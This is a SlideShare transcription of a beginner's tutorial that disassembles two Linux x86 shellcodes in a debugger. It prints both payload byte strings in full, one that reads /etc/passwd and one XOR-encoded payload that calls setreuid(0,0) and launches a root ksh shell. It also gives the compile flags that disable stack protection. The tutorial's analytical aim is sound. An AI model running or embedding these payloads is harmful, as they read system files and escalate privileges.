SlideShare a Scribd company logo

Shellcode Disassembling - Reverse Engineering

Sumutiu Marius, profile picture
Sumutiu Marius

This document provides a basic guide to reverse engineering Linux x86 shellcode. It summarizes reversing two sample shellcodes: 1) A simple shellcode that reads the /etc/passwd file, and 2) An XOR encrypted shellcode that launches a new ksh shell with root privileges. It explains breaking down the shellcode using a debugger to understand what it is doing by examining registers, system calls and related functions. The goal is to understand how the shellcode works rather than just trusting its described purpose.

InternetTechnology
1 of 5
Downloaded 11 times
1
2
3
4
5
Linux x86 Reverse Engineering Basic guide of Shellcode Disassembling Harsh N. Daftary Sr. Security Researcher at CSPF Security Consultant at Trunkoz Technologies info@securityLabs.in Abstract:-- Most of the Windows as well as Linux based programs contains bugs or security holes and/or errors. These bugs or error in program can be exploited in order to crash the program or make system do unwanted stuff Exploit usually attacks the program on Memory Corruption, Segmentation Dump, format string, Buffer overflow or something else. In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. It is just a basic guide, not for l33t reverse engineers :) Introduction:- Shellcode are not responsible for exploiting but to create a shell or execute something on victim system after exploiting the bug. Shellcode can execute almost all the functions that a independent program could. Execution of this code takes place after exploiting vulnerability.(usually) Importance : By just looking at shellcode we cannot say what it does, As hackers often uses various shellcodes along with their respective exploits We just believe what description of shellcode says and are ready to run it but, How can we trust it. It can do many other functions apart from what its description say and it can end up in compromising our own system, or create backdoor for shellcode author So the reverse Engineering Helps us to to get idea of working of the code. Basic idea about encryption and x86 structure is required. General Registers : 32 bits : EAX EBX ECX EDX 16 bits : AX BX CX DX 8 bits : AH AL BH BL CH CL DH EAX,AX,AH,AL : Called the Accumulator register. It is used for I/O port access, arithmetic, interrupt calls. Segment Registers : CS DS ES FS GS SS Segment registers hold the segment address of various items Index and Pointers: ESI EDI EBP EIP ESP idexes and pointer and the offset part of and address. They have various uses but each register has a specific function. Test System Specification : Linux Ubuntu 10.04 Intel i3 System Architecture: x86- 32 bit NASM assembled shellcode In this paper I would discuss Reverse Engineering of Two programs. 1. Simple program that reades /etc/passwd file 2. XOR encrypted shellcode that launches new shell ksh with setreuid (0,0)
1. Simple program that reads /etc/passwd file Shellcode: ( Download Link given in the end ) "x31xc0x99x52x68x2fx63x61x74x68x2fx62x69x6e x89xe3x52x68x73x73x77x64x68x2fx2fx70x61x68x 2fx65x74x63x89xe1xb0x0bx52x51x53x89xe1xcdx8 0" Now we create a simple program that will execute this code and Compile it using gcc –fno-stack-protector -z execstack code.c –o shellcode It will compile our code and program should work without any hindrance. Lets load our Program into Debugger Now we set the disassembling structure to intel. Looking at our source code file we can find that the name of pointer in which we stored our shellcode is "code" so we create breakpoint at this pointer and run so at point we hit our breakpoint that time we disassemble the program Debugger Output: 0x0804a040 <+0>: xor eax,eax --- > It will xor eax with eax, it is used to make eax register 0 0x0804a042 <+2>: cdq 0x0804a043 <+3>: push edx 0x0804a044 <+4>: push 0x7461632f 0x0804a049 <+9>: push 0x7461632f = tac/ 0x0804a04e <+14>: mov ebx,esp --- > Copies the data stored into esp into ebx 0x0804a050 <+16>: push edx 0x0804a051 <+17>: push 0x64777373 0x0804a056 <+22>: push 0x61702f2f 0x0804a05b <+27>: push 0x6374652f 0x0804a060 <+32>: mov ecx,esp 0x0804a062 <+34>: mov al,0xb --- > loads AL register with (0xb)hex 0x0804a064 <+36>: push edx 0x0804a065 <+37>: push ecx 0x0804a066 <+38>: push ebx 0x0804a067 <+39>: mov ecx,esp --- > copy data stored in esp into ecx register 0x0804a069 <+41>: int 0x80 --- > Makes a syscall by interrupt 80 0x0804a06b <+43>: add BYTE PTR [eax],al So now we have to stop just before execution so we create breakpoint at a place where program makes a syscall i.e. at address: 0x0804a069 Interrupt 80 makes a syscall with syscall number stored in eax register, as we can see by code: print /x $eax -->> $eax = 11 We need to find function that will start at syscall number 11 so under x86 structure we open : /usr/src/your linux header/arch/x86/include/asm/unistd_32.h
This file contains list of functions against their syscall numbers So at 11th number we understand that program is calling "execve" Manual of execve : Now lets examine values stored in other 32 bit registers ebx i.e. Second argument contains a hex number which converted into string as /bin/cat cat is Linux bash command used to read a file 3rd argument i.e. ecx register stores a location of file which "/bin/cat" will read so file is 0xbffff3d0: "/etc//passwd" Program will read /etc/passwd file and then will exit. 2. XOR enecrypted shellcode thats launches new shell ksh with setreuid (0,0) Shellcode : "xebx0dx5ex31xc9xb1x21x80x36x7cx46xe2xfaxeb x05xe8xeexffxffxffx16x3ax24x4dxa7x4dxb5xb1xfc x4dxaex16x77x24x2ex14x53x17x0fx14x14x53x1ex 15x12xf5x9fx2ex2fxf5x9dxb1xfc" Now we create a simple prorgam that will execute this code and Compile it using gcc –fno-stackp-protector -z execstack code.c –o shellcode Importance of this code it to compile our code without any hindrance. Lets load our Program into Debugger Looking at our source code file we can find that the name of pointer in which we stored our shellcode is "code" creating breakpoint and analyzing 0x0804a047 <+7>: xorb $0x7c,(%esi) 0x0804a04a <+10>: inc %esi 0x0804a04b <+11>: loop 0x804a047 <code+7> 0x0804a04d <+13>: jmp 0x804a054 <code+20>
Here this lines of code will xor decrypt all the commands till end with 0x7c and then will jump to 0x804a054 So now we create break point just after XOR decryption finishes and before it jumps to another memory location for further execution As we can compare disassembly output to the previous one, we can understand all the instructions after 0x0804a04d are now decrypted So basically XOR decryption is finished, Now we look at EIP +27 we see that Interrupt 80 is being called for syscall so we new create our new breakpoint there Just as Before EAX register contains Syscall Number EBX and ECX register contains Argument Syscall Number is 70 And Arguments are 0,0 /usr/src/your linux header/arch/x86/include/asm/unistd_32.h
So Here 1st argument sets uid and 2nd argument sets gid Which in our case both are 0 Means the program here is trying to get the root access over system. Now lets create breakpoint where program calls interrupt 80 to make a syscall Here again we Have Syscall Number 11 that is execve function as we saw that last time. And EBX register contains hex data which we convert into string so we get /bin/ksh So it means This shellcode is going to first decode it self, then will try open another shell (KSH) located at /bin/ksh with root access If you find anything missing or have any suggestions feel free to contact me :) ~Regards, Harsh info@securitylabs.in PS : 1. Data associated with PUSH can be directly analyzed by converting hex into string, but that data/string will be Right- to-Left. 2. Location of unistd_32.h may be different. Using locate function may be helpful in finding it. This is just basic guide, Next paper will be in more detail. Reference : 1. Vivek ramchandran. 2. J prassanna and Hiren Shah for providing research platform. Shellcodes : 1. http://www.shell- storm.org/shellcode/files/shellcode-809.php 2. http://www.shell- storm.org/shellcode/files/shellcode-571.php

More Related Content

PDF
Linux Shellcode disassembling
Harsh Daftary
 
PDF
CyberLink LabelPrint 2.5 Exploitation Process
Thomas Gregory
 
PDF
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
CODE BLUE
 
PDF
Magic Clusters and Where to Find Them - Eugene Pirogov
Elixir Club
 
PPTX
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
KEY
Openssl
psychesnet Hsieh
 
PDF
Summarized of UNIX Time Sharing System
Shuya Osaki
 
PDF
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...
mfrancis
 
Linux Shellcode disassembling
Harsh Daftary
 
CyberLink LabelPrint 2.5 Exploitation Process
Thomas Gregory
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
CODE BLUE
 
Magic Clusters and Where to Find Them - Eugene Pirogov
Elixir Club
 
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Openssl
psychesnet Hsieh
 
Summarized of UNIX Time Sharing System
Shuya Osaki
 
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...
mfrancis
 

What's hot (20)

PPTX
Penetration testing using python
Purna Chander K
 
ODP
Sysprog17
Ahmed Mekkawy
 
PPT
Unix Programming with Perl 2
Kazuho Oku
 
PPT
Socket Programming
Sivadon Chaisiri
 
PDF
Magic Clusters and Where to Find Them 2.0 - Eugene Pirogov
Elixir Club
 
DOCX
Linux 系統程式--第一章 i/o 函式
艾鍗科技
 
PPT
Os Vanrossum
oscon2007
 
KEY
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
PPT
Unix Programming with Perl
Kazuho Oku
 
PDF
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
Code Engn
 
ODP
Pycon Sec
guesta762e4
 
PDF
Nodejs 프로그래밍 ch.3
HyeonSeok Choi
 
PPTX
Using the Power to Prove
Kazuho Oku
 
PPTX
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
zakiakhmad
 
PPT
Formatul Portable Executable
DefCamp
 
PDF
IDSECCONF2013 CTF online Write Up
idsecconf
 
PDF
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
DefCamp
 
PDF
OpenSSL Basic Function Call Flow
William Lee
 
PDF
Remote Command Execution
adil raja
 
PDF
ZeroNights: Automating iOS blackbox security scanning
Mikhail Sosonkin
 
Penetration testing using python
Purna Chander K
 
Sysprog17
Ahmed Mekkawy
 
Unix Programming with Perl 2
Kazuho Oku
 
Socket Programming
Sivadon Chaisiri
 
Magic Clusters and Where to Find Them 2.0 - Eugene Pirogov
Elixir Club
 
Linux 系統程式--第一章 i/o 函式
艾鍗科技
 
Os Vanrossum
oscon2007
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
Unix Programming with Perl
Kazuho Oku
 
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
Code Engn
 
Pycon Sec
guesta762e4
 
Nodejs 프로그래밍 ch.3
HyeonSeok Choi
 
Using the Power to Prove
Kazuho Oku
 
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
zakiakhmad
 
Formatul Portable Executable
DefCamp
 
IDSECCONF2013 CTF online Write Up
idsecconf
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
DefCamp
 
OpenSSL Basic Function Call Flow
William Lee
 
Remote Command Execution
adil raja
 
ZeroNights: Automating iOS blackbox security scanning
Mikhail Sosonkin
 
Ad

Similar to Shellcode Disassembling - Reverse Engineering (20)

PDF
Shellcoding in linux
Ajin Abraham
 
PDF
Buffer Overflow - Smashing the Stack
ironSource
 
PPTX
Buffer overflow – Smashing The Stack
Tomer Zait
 
PDF
X86 assembly nasm syntax
Francesco DiFusco
 
PPTX
Tranning-2
Ali Hussain
 
PPT
Writing Metasploit Plugins
amiable_indian
 
PDF
SFO15-500: VIXL
Linaro
 
PPTX
How To Add System Call In Ubuntu OS
Pratik Tambekar
 
PDF
Dive into exploit development
Payampardaz
 
PPT
Troubleshooting Linux Kernel Modules And Device Drivers
Satpal Parmar
 
PPT
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Jagadisha Maiya
 
PDF
Heap overflows for humans – 101
Craft Symbol
 
PDF
N_Asm Assembly arithmetic instructions (sol)
Selomon birhane
 
PDF
Shellcoding, an Introduction
Daniele Bellavista
 
PDF
N_Asm Assembly system calls (sol)
Selomon birhane
 
PDF
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
Patricia Aas
 
PPTX
32 bit and 64 bit Register manipulation
raheel_niazi
 
PDF
Strategies to design FUD malware
Pedro Tavares
 
PPTX
NASM Introduction.pptx
AnshKarwa
 
PDF
X86 assembly & GDB
Jian-Yu Li
 
Shellcoding in linux
Ajin Abraham
 
Buffer Overflow - Smashing the Stack
ironSource
 
Buffer overflow – Smashing The Stack
Tomer Zait
 
X86 assembly nasm syntax
Francesco DiFusco
 
Tranning-2
Ali Hussain
 
Writing Metasploit Plugins
amiable_indian
 
SFO15-500: VIXL
Linaro
 
How To Add System Call In Ubuntu OS
Pratik Tambekar
 
Dive into exploit development
Payampardaz
 
Troubleshooting Linux Kernel Modules And Device Drivers
Satpal Parmar
 
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Jagadisha Maiya
 
Heap overflows for humans – 101
Craft Symbol
 
N_Asm Assembly arithmetic instructions (sol)
Selomon birhane
 
Shellcoding, an Introduction
Daniele Bellavista
 
N_Asm Assembly system calls (sol)
Selomon birhane
 
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
Patricia Aas
 
32 bit and 64 bit Register manipulation
raheel_niazi
 
Strategies to design FUD malware
Pedro Tavares
 
NASM Introduction.pptx
AnshKarwa
 
X86 assembly & GDB
Jian-Yu Li
 
Ad

More from Sumutiu Marius (7)

PDF
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Sumutiu Marius
 
PDF
Stratfor Forensic Hack Investigation - Verizon
Sumutiu Marius
 
PDF
The Dark Arts of Hacking.
Sumutiu Marius
 
PDF
Hacking Web Aplications using Cookie Poisoning
Sumutiu Marius
 
PDF
BlackHat Hacking - Hacking VoIP.
Sumutiu Marius
 
PDF
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Sumutiu Marius
 
ODP
Design and Implementation of Shellcodes.
Sumutiu Marius
 
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Sumutiu Marius
 
Stratfor Forensic Hack Investigation - Verizon
Sumutiu Marius
 
The Dark Arts of Hacking.
Sumutiu Marius
 
Hacking Web Aplications using Cookie Poisoning
Sumutiu Marius
 
BlackHat Hacking - Hacking VoIP.
Sumutiu Marius
 
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Sumutiu Marius
 
Design and Implementation of Shellcodes.
Sumutiu Marius
 

Recently uploaded (20)

PPT
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
MelwinPaul6
 
PPTX
Module 1 - Cyber Law and Ethics 101.pptx
anantyakhrisna1
 
PPT
Design_with_Watersergyerge45hrbgre4top (1).ppt
DiogoRibeiro730590
 
PPTX
artificial intelligence overview of it and more
yafotin445
 
PDF
Tenda Login Guide: Access Your Router in 5 Easy Steps
tendawifi16
 
PDF
Unit-1 introduction to cyber security discuss about how to secure a system
shivangisharma636228
 
PPTX
INTERNET------BASICS-------UPDATED PPT PRESENTATION
poonam62133
 
PDF
WebRTC in SignalWire - troubleshooting media negotiation
Giacomo Vacca
 
PPT
tcp ip networks nd ip layering assotred slides
pakadamfdp
 
PPTX
Introuction about ICD -10 and ICD-11 PPT.pptx
naveenithkrishnan
 
DOCX
Unit-3 cyber security network security of internet system
shivangisharma636228
 
PPTX
newyork.pptxirantrafgshenepalchinachinane
PrashantKoirala12
 
PPTX
Mathew Digital SEO Checklist Guidlines 2025
Mathew Digital
 
PDF
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
IJMIT JOURNAL
 
PDF
Paper PDF World Game (s) Great Redesign.pdf
Steven McGee
 
PPTX
presentation_pfe-universite-molay-seltan.pptx
yahyamohibme
 
PPTX
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
KuyaRogie
 
PDF
The New Creative Director: How AI Tools for Social Media Content Creation Are...
SageTitans
 
PDF
An introduction to the IFRS (ISSB) Stndards.pdf
farhankhan13694
 
PDF
Cloud-Scale Log Monitoring _ Datadog.pdf
MuhammadDhomanhuriMa
 
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
MelwinPaul6
 
Module 1 - Cyber Law and Ethics 101.pptx
anantyakhrisna1
 
Design_with_Watersergyerge45hrbgre4top (1).ppt
DiogoRibeiro730590
 
artificial intelligence overview of it and more
yafotin445
 
Tenda Login Guide: Access Your Router in 5 Easy Steps
tendawifi16
 
Unit-1 introduction to cyber security discuss about how to secure a system
shivangisharma636228
 
INTERNET------BASICS-------UPDATED PPT PRESENTATION
poonam62133
 
WebRTC in SignalWire - troubleshooting media negotiation
Giacomo Vacca
 
tcp ip networks nd ip layering assotred slides
pakadamfdp
 
Introuction about ICD -10 and ICD-11 PPT.pptx
naveenithkrishnan
 
Unit-3 cyber security network security of internet system
shivangisharma636228
 
newyork.pptxirantrafgshenepalchinachinane
PrashantKoirala12
 
Mathew Digital SEO Checklist Guidlines 2025
Mathew Digital
 
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
IJMIT JOURNAL
 
Paper PDF World Game (s) Great Redesign.pdf
Steven McGee
 
presentation_pfe-universite-molay-seltan.pptx
yahyamohibme
 
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
KuyaRogie
 
The New Creative Director: How AI Tools for Social Media Content Creation Are...
SageTitans
 
An introduction to the IFRS (ISSB) Stndards.pdf
farhankhan13694
 
Cloud-Scale Log Monitoring _ Datadog.pdf
MuhammadDhomanhuriMa
 

Shellcode Disassembling - Reverse Engineering

  • 1. Linux x86 Reverse Engineering Basic guide of Shellcode Disassembling Harsh N. Daftary Sr. Security Researcher at CSPF Security Consultant at Trunkoz Technologies info@securityLabs.in Abstract:-- Most of the Windows as well as Linux based programs contains bugs or security holes and/or errors. These bugs or error in program can be exploited in order to crash the program or make system do unwanted stuff Exploit usually attacks the program on Memory Corruption, Segmentation Dump, format string, Buffer overflow or something else. In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. It is just a basic guide, not for l33t reverse engineers :) Introduction:- Shellcode are not responsible for exploiting but to create a shell or execute something on victim system after exploiting the bug. Shellcode can execute almost all the functions that a independent program could. Execution of this code takes place after exploiting vulnerability.(usually) Importance : By just looking at shellcode we cannot say what it does, As hackers often uses various shellcodes along with their respective exploits We just believe what description of shellcode says and are ready to run it but, How can we trust it. It can do many other functions apart from what its description say and it can end up in compromising our own system, or create backdoor for shellcode author So the reverse Engineering Helps us to to get idea of working of the code. Basic idea about encryption and x86 structure is required. General Registers : 32 bits : EAX EBX ECX EDX 16 bits : AX BX CX DX 8 bits : AH AL BH BL CH CL DH EAX,AX,AH,AL : Called the Accumulator register. It is used for I/O port access, arithmetic, interrupt calls. Segment Registers : CS DS ES FS GS SS Segment registers hold the segment address of various items Index and Pointers: ESI EDI EBP EIP ESP idexes and pointer and the offset part of and address. They have various uses but each register has a specific function. Test System Specification : Linux Ubuntu 10.04 Intel i3 System Architecture: x86- 32 bit NASM assembled shellcode In this paper I would discuss Reverse Engineering of Two programs. 1. Simple program that reades /etc/passwd file 2. XOR encrypted shellcode that launches new shell ksh with setreuid (0,0)
  • 2. 1. Simple program that reads /etc/passwd file Shellcode: ( Download Link given in the end ) "x31xc0x99x52x68x2fx63x61x74x68x2fx62x69x6e x89xe3x52x68x73x73x77x64x68x2fx2fx70x61x68x 2fx65x74x63x89xe1xb0x0bx52x51x53x89xe1xcdx8 0" Now we create a simple program that will execute this code and Compile it using gcc –fno-stack-protector -z execstack code.c –o shellcode It will compile our code and program should work without any hindrance. Lets load our Program into Debugger Now we set the disassembling structure to intel. Looking at our source code file we can find that the name of pointer in which we stored our shellcode is "code" so we create breakpoint at this pointer and run so at point we hit our breakpoint that time we disassemble the program Debugger Output: 0x0804a040 <+0>: xor eax,eax --- > It will xor eax with eax, it is used to make eax register 0 0x0804a042 <+2>: cdq 0x0804a043 <+3>: push edx 0x0804a044 <+4>: push 0x7461632f 0x0804a049 <+9>: push 0x7461632f = tac/ 0x0804a04e <+14>: mov ebx,esp --- > Copies the data stored into esp into ebx 0x0804a050 <+16>: push edx 0x0804a051 <+17>: push 0x64777373 0x0804a056 <+22>: push 0x61702f2f 0x0804a05b <+27>: push 0x6374652f 0x0804a060 <+32>: mov ecx,esp 0x0804a062 <+34>: mov al,0xb --- > loads AL register with (0xb)hex 0x0804a064 <+36>: push edx 0x0804a065 <+37>: push ecx 0x0804a066 <+38>: push ebx 0x0804a067 <+39>: mov ecx,esp --- > copy data stored in esp into ecx register 0x0804a069 <+41>: int 0x80 --- > Makes a syscall by interrupt 80 0x0804a06b <+43>: add BYTE PTR [eax],al So now we have to stop just before execution so we create breakpoint at a place where program makes a syscall i.e. at address: 0x0804a069 Interrupt 80 makes a syscall with syscall number stored in eax register, as we can see by code: print /x $eax -->> $eax = 11 We need to find function that will start at syscall number 11 so under x86 structure we open : /usr/src/your linux header/arch/x86/include/asm/unistd_32.h
  • 3. This file contains list of functions against their syscall numbers So at 11th number we understand that program is calling "execve" Manual of execve : Now lets examine values stored in other 32 bit registers ebx i.e. Second argument contains a hex number which converted into string as /bin/cat cat is Linux bash command used to read a file 3rd argument i.e. ecx register stores a location of file which "/bin/cat" will read so file is 0xbffff3d0: "/etc//passwd" Program will read /etc/passwd file and then will exit. 2. XOR enecrypted shellcode thats launches new shell ksh with setreuid (0,0) Shellcode : "xebx0dx5ex31xc9xb1x21x80x36x7cx46xe2xfaxeb x05xe8xeexffxffxffx16x3ax24x4dxa7x4dxb5xb1xfc x4dxaex16x77x24x2ex14x53x17x0fx14x14x53x1ex 15x12xf5x9fx2ex2fxf5x9dxb1xfc" Now we create a simple prorgam that will execute this code and Compile it using gcc –fno-stackp-protector -z execstack code.c –o shellcode Importance of this code it to compile our code without any hindrance. Lets load our Program into Debugger Looking at our source code file we can find that the name of pointer in which we stored our shellcode is "code" creating breakpoint and analyzing 0x0804a047 <+7>: xorb $0x7c,(%esi) 0x0804a04a <+10>: inc %esi 0x0804a04b <+11>: loop 0x804a047 <code+7> 0x0804a04d <+13>: jmp 0x804a054 <code+20>
  • 4. Here this lines of code will xor decrypt all the commands till end with 0x7c and then will jump to 0x804a054 So now we create break point just after XOR decryption finishes and before it jumps to another memory location for further execution As we can compare disassembly output to the previous one, we can understand all the instructions after 0x0804a04d are now decrypted So basically XOR decryption is finished, Now we look at EIP +27 we see that Interrupt 80 is being called for syscall so we new create our new breakpoint there Just as Before EAX register contains Syscall Number EBX and ECX register contains Argument Syscall Number is 70 And Arguments are 0,0 /usr/src/your linux header/arch/x86/include/asm/unistd_32.h
  • 5. So Here 1st argument sets uid and 2nd argument sets gid Which in our case both are 0 Means the program here is trying to get the root access over system. Now lets create breakpoint where program calls interrupt 80 to make a syscall Here again we Have Syscall Number 11 that is execve function as we saw that last time. And EBX register contains hex data which we convert into string so we get /bin/ksh So it means This shellcode is going to first decode it self, then will try open another shell (KSH) located at /bin/ksh with root access If you find anything missing or have any suggestions feel free to contact me :) ~Regards, Harsh info@securitylabs.in PS : 1. Data associated with PUSH can be directly analyzed by converting hex into string, but that data/string will be Right- to-Left. 2. Location of unistd_32.h may be different. Using locate function may be helpful in finding it. This is just basic guide, Next paper will be in more detail. Reference : 1. Vivek ramchandran. 2. J prassanna and Hiren Shah for providing research platform. Shellcodes : 1. http://www.shell- storm.org/shellcode/files/shellcode-809.php 2. http://www.shell- storm.org/shellcode/files/shellcode-571.php